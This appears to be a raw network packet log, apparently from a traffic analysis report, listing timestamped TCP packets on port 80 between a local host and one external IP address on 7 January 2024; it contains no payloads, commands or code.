                                                                                                                                                                    Jan 7, 2024 05:29:29.247075081 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.247268915 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.247307062 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.247350931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.247386932 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.247431993 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.247447014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.247487068 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.247490883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.247531891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.247536898 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.247569084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.247618914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.247777939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.247814894 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.247889042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.247925043 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.247989893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.248042107 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.248126030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.248209000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.248244047 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.248261929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.248300076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.248322010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.248359919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.248447895 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.248502016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.248543978 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.248703003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.248737097 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.248889923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.248908997 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.248949051 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.249027967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.249067068 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.249156952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.249212027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.249254942 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.249273062 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.249299049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.249341011 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.249341965 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.249380112 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.249396086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.249437094 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.250118017 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.250159979 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.250272989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.250315905 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.250351906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.250427008 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.250606060 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.250648975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.250684977 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.250720024 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.250932932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.250977993 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.251020908 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.251044989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.251072884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.251091003 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.251125097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.251200914 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.251240015 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.251276970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.251312971 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.251355886 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.251394033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.251422882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.251432896 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.251460075 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.251794100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.251830101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.251833916 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.251910925 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.252144098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.252212048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.252226114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.252264977 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.252293110 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.252317905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.252336025 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.252480030 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.252480030 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.434166908 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.434242964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.434308052 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.434725046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.434838057 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.434892893 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.435079098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.435169935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.435218096 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.435354948 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.435476065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.435528994 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.435583115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.435695887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.435786009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.435833931 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.436052084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.436105013 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.436201096 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.436314106 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.436455011 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.436506987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.436896086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.436994076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.436997890 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.437184095 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.437251091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.437297106 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.437464952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.437514067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.437529087 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.437551975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.437592030 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.437658072 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.437709093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.437762022 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.438047886 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.438097000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.438402891 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.438785076 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.439222097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.439275026 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.439428091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.439546108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.439738035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.439766884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.439791918 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.439815044 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.439887047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.439990044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.440032959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.440073967 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.440170050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.440243006 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.440397024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.440474033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.440509081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.440521002 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.440669060 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.440733910 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.440771103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.440788984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.440804958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.440850019 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.440969944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441036940 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441042900 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.441071987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441107035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441160917 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.441282034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441329956 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.441406012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441457033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441502094 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.441520929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441603899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441685915 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.441706896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441765070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.441828966 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.441859961 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442018032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442068100 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.442076921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442150116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442166090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442188025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442214966 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.442240953 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.442276955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442420006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442481041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442481041 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.442567110 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442620993 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442662954 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.442681074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442718029 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.442728996 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442785978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442846060 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442874908 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.442893982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442928076 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.442934990 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.443129063 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.443177938 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.443229914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.443618059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.443716049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.443747997 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.443834066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.443886042 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.444273949 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.444348097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.444423914 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.444509029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.444567919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.444607973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.444636106 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.444785118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.444833994 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.444916010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.445000887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.445087910 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.445132017 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.445288897 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.445375919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.445426941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.445427895 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.445465088 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.445517063 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.445692062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.445806980 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.446033955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.446094036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.446135998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.446178913 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.446321964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.446384907 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.446410894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.446466923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.446654081 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.628212929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.628298998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.628355026 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.628885984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.628972054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.629014969 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.629075050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.629336119 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.629385948 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.629906893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.630000114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.630040884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.630161047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.630270958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.630320072 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.630393982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.630649090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.630865097 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.631048918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.631175041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.631231070 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.631274939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.631400108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.631445885 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.632041931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.632328987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.632384062 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.632431030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.632639885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.632705927 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.632787943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.632889986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.632930994 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.632985115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.633064032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.633121967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.633177042 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.633181095 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.633219957 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.633260012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.633358002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.633430004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.633431911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.633480072 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.633523941 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.633555889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.633780003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.633827925 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.634419918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.634666920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.634712934 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.635129929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.635437965 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.635488987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.635576010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.635670900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.635745049 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.635781050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.635946989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.635994911 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.636104107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.636132956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.636178970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.636205912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.636464119 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.636558056 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.636563063 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.636990070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.637048960 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.637145996 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.637202978 CET804973591.215.85.120192.168.2.4
